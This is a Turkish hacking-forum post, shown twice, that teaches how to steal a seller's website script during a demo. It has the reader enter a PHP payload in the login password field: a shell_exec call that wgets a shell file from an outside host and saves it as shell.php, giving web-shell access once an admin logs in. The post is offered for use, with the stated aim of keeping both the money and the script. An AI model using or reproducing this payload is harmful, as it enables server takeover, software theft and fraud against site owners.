-
Elessya
Eski Ben Çok Eskide Kaldı.
Selam Arkadaşlar bu konuda sizlere Demo Ayağına Kurucu Geçen Scripti Nasıl Çekersiniz Onu Anlatıcam.
ilk önce demoyu alıyoruz hedef kişiden Demo muzu istiyoruz
Bir Kullanıcı Adı Girip Şifre Kısmına Shellimizi sokuyoruz
[CHARGE=50]
[/CHARGE]
"Şifre Kısmına Bu Shell Kodunu Yazıyorsunuz."
Bilinmeyen hata verirse o site Shell Yemiyor
şifre yanlış hatası verirse yediği anlamına geliyor
Shell Yerse Demo Atan Kişiye Gidip Admini Atmasını veya admine
girmesini söylüyorsunuz admine girerse hosting'e erişim sağladınız artık.
Peki Nasıl Giricem?
siteismi.com/Shell.php
siteismi.com/shell.php
bu kodlardan birini deneyin.
Hop bu şekil
Girişimizi yapalım Shell'e ve hedef sitenin scriptini çekelim
böylelikle parada cebinizde kaldı scriptde sizin.
Dipnot;
"Sitede XSS Açığı fixlendiyse o siteden çekmeniz çok zor
ama onu herkes fixleyemez bilginize"
Yakında Nasıl Fixlenir Konusuda Gelicek.
ilk önce demoyu alıyoruz hedef kişiden Demo muzu istiyoruz
Bir Kullanıcı Adı Girip Şifre Kısmına Shellimizi sokuyoruz
[CHARGE=50]
PHP:
<?php $çıktı = shell_exec('wget https://www.merbamakina.com.tr/tema/genel/uploads/ik/shell.txt && mv shell.txt shell.php'); echo "<pre>$çıktı</pre>";?>
"Şifre Kısmına Bu Shell Kodunu Yazıyorsunuz."
Bilinmeyen hata verirse o site Shell Yemiyor
şifre yanlış hatası verirse yediği anlamına geliyor
Shell Yerse Demo Atan Kişiye Gidip Admini Atmasını veya admine
girmesini söylüyorsunuz admine girerse hosting'e erişim sağladınız artık.
Peki Nasıl Giricem?
siteismi.com/Shell.php
siteismi.com/shell.php
bu kodlardan birini deneyin.
Hop bu şekil
Girişimizi yapalım Shell'e ve hedef sitenin scriptini çekelim
böylelikle parada cebinizde kaldı scriptde sizin.
Dipnot;
"Sitede XSS Açığı fixlendiyse o siteden çekmeniz çok zor
ama onu herkes fixleyemez bilginize"
Yakında Nasıl Fixlenir Konusuda Gelicek.
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl